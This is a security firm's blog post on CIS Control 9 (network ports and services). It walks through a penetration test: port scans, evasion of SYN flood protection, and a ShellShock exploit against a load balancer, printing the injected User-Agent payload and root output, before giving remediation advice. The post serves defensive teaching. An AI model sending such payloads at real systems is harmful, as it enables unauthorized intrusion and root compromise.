Top 20 CIS Critical Security Controls (CSC) Through the Eyes of a Hacker – CSC 9
Top 20 CIS Critical Security Controls (CSC) Through the Eyes of a Hacker – CSC 9
Top 20 CIS Critical Security Controls (CSC) Through the Eyes of a Hacker – CSC 9
Top 20 CIS Critical Security Controls (CSC) Through the Eyes of a Hacker – CSC 9
In this blog series members of Optiv's attack and penetration team are covering the top 20 Center for Internet Security (CIS) Critical Security Controls (CSC), showing an attack example and explaining how the control could have prevented the attack from being successful. Please read previous posts covering:
- CSC 1: Inventory of Authorized and Unauthorized Devices
- CSC 2: Inventory of Authorized and Unauthorized Software
- CSC 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers
- CSC 4: Continuous Vulnerability Assessment and Remediation
- CSC 5: Controlled Use of Administrative Privileges
- CSC 6: Maintenance, Monitoring, and Analysis of Audit Logs
- CSC 7: Email and Web Browser Protections
- CSC 8: Malware Defenses
CSC 9: Limitation and Control of Network Ports, Protocols and Services
The Control
Manage (track/control/correct) the ongoing operational use of ports, protocols and services on networked devices in order to minimize windows of vulnerability available to attackers.
The Attack
Attack surfaces are composed of the various endpoints and services that are accessible to external users. Although they are designed for use by authorized parties, malicious users could potentially gain unauthorized access through any available service. As such, one of the most effective means of mitigating risk exposure is through minimization of the available attack surface.
Unfortunately, organizations routinely create undue risk on perimeter-facing assets due to unnecessary host and/or service accessibility. Superfluous network services can arise from a variety of reasons such as poorly defined or non-existent audit standards, security programs, change management processes or simple human error. Small firms generally lack adequate resources to support full-time security staff, while large scale enterprises often struggle to secure external systems due to compatibility requirements, operational objectives or the scale of their perimeter network footprint.
Businesses should use layered perimeter defenses such as application-aware firewalls, network access controls and intrusion detection/prevention systems to avert unauthorized access. However, some perimeter defenses, such as SYN flood protection, can reduce risk exposure while simultaneously providing a false sense of security. In the attack below, I will demonstrate why a defense-in-depth approach is critical to securing an organization’s network perimeter.
On a recent engagement, I encountered the following results from a quick Nmap scan:
desktop:~# nmap -T4 63.***.***.***
Starting Nmap 6.49BETA2 ( http://nmap.org ) at 2016-06-20 16:43 CDT
Nmap scan report for 63.***.****.***
Host is up (0.053s latency).
PORT STATE SERVICE
1/tcp open tcpmux
3/tcp open compressnet
4/tcp open unknown
6/tcp open unknown
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
20/tcp open ftp-data
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
24/tcp open priv-mail
<truncated — all 1024 default nmap ports return open>
Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds
Attempts to run automated vulnerability scanners against the specified target would time out, fail to enumerate services, and generally return flawed or invalid data. The client was under the impression that malicious activity would be thwarted as in-house automated vulnerability scans failed to identify any exploitable vulnerabilities.
However, SYN flood protection can be circumvented through inspection of the TCP flags returned for any given connection attempt. In this instance, I used Cookiescan to inspect TCP flags and identify services that were actually accessible from public networks.
desktop:~# ./cookiescan -p $(cat nmap-top-tcp-csv) -i eth0.1581 -t 500 -g 50 63.***.***.***
4m30s [=======================================================] 100%
Host: 63.***.***.***
Port State Service Confidence Reason
24 open unknown 3 [[ack] [ack] [fin ack]]
35 open unknown 1 [ack]
77 open unknown 2 [[ack] [ack]]
87 open unknown 3 [[ack] [ack] [fin ack]]
The above services were listening on non-standard ports, and could only be partially identified through targeted port scans.
desktop:~# nmap -sV 63.***.***.*** -p 24,35,77,87 -T4 --version-intensity=0
Starting Nmap 6.49BETA2 ( http://nmap.org ) at 2016-06-21 12:57 CDT
Service scan Timing: About 100.00% done; ETC: 12:57 (0:00:00 remaining)
Nmap scan report for 63.***.***.***)
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
24/tcp open priv-mail?
35/tcp open priv-print?
77/tcp open ssh OpenSSH 6.0 (protocol 2.0)
87/tcp open telnet Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.76 seconds
SSH and Telnet could be subjected to password guessing attacks or potentially disclose credentials through man-in-the-middle attacks, however 24/TCP and 35/TCP piqued my curiosity as Nmap couldn’t immediately identify them. HTTP and HTTPS are two of the most common services exposed on perimeter systems, and manual inspection revealed that 24/TCP was HTTP while 35/TCP was HTTPS.
desktop:~# curl 63.***.***.***:24 -vv
* About to connect() to 63.***.***.*** port 24 (#0)
* Trying 63.***.***.***.***... connected
> GET / HTTP/1.1
> User-Agent: curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3
> Host: 63.***.***.***:24
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Tue, 21 Jun 2016 18:03:03 GMT
< Server: Apache
< Expires: -1
< Pragma: no-cache
< Cache-Control: no-cache
< Connection: close
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=utf-8
Additional inspection revealed that the SSL listener on 35/TCP was actually a login page for a production load balancer.
I researched the device and found WebMux load balancer documentation that contained default credentials. Although default credentials did not permit access, the documentation revealed that a CGI-enabled status page was accessible without authentication. Given the copyright date, target operating system and lack of security updates, I manually tested for ShellShock (CVE 2014-6271).
HTTP Request:
GET /cgi-bin/about HTTP/1.1
Host: 63.***.***.***:35
Accept: */*
Accept-Language: en
User-Agent: () { :; }; /bin/bash -c 'id'
Connection: close
Referer: https://63.***.***.***:35/cgi-bin/about
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
HTTP Response:
<td>
WebMux version 9.1.00 built Jul 12 2012 12:36:35<br>
patch level: none<br>
model: WebMux (part number 592SGQ) <br>
serial number: ************ manufactured Oct ** ****<br>
CPU speed: uid=0(root) MHz<br>
CPUs: uid=0(root)<br>
total memory: uid=0(root) k<br>
configured as: one-armed single network (with SNAT)<br>
</td>
The load balancer’s web interface was vulnerable to ShellShock, and operating as the root user. I exploited this to gain access to the system, pivot into other DMZ hosts and eventually obtain access to internal network segments.
The Solution
CSC controls are intended to be applied as part of a defense-in-depth approach. CSC 9 involves more than just perimeter firewalls – it encompasses endpoint firewalls, routine port scans to verify configurations, removal of unnecessary services/systems, segmentation of critical services across discrete systems and application-layer firewalls.
Although the client changed default credentials, segmented critical services and performed routine port scans, they failed to remove unnecessary services, apply patches or restrict access to management functionality through firewall access control lists. Management services such as Remote Desktop, SSH and web-based administrative functionality should be protected behind IP-based access control restrictions and only accessible from trusted hosts or network segments. In this instance, the load balancer itself was in active use and routinely scanned for vulnerabilities but didn’t appear critically vulnerable based on automated testing results.
As demonstrated, over-reliance on automated tools and scanning engines can lead to unintended risk exposure. It is important for organizations to not only monitor and restrict service accessibility but also verify that testing mechanisms accurately validate control and process effectiveness.
The next post will cover CSC 10: Data Recovery Capability.